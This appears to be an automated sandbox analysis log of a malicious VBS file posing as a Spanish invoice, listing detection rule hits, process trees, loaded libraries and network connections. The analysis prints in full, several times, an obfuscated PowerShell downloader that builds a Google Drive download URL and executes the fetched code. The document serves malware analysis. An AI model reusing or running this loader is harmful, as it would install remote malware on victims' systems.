Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5960.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5960, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6742
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6742Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Jump to behavior
Source: FACTURA24021151 - BP.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_5960.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5960, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal96.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\microdactylous.AarJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e325cqtp.nie.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: FACTURA24021151 - BP.vbsReversingLabs: Detection: 23%
Source: FACTURA24021151 - BP.vbsVirustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
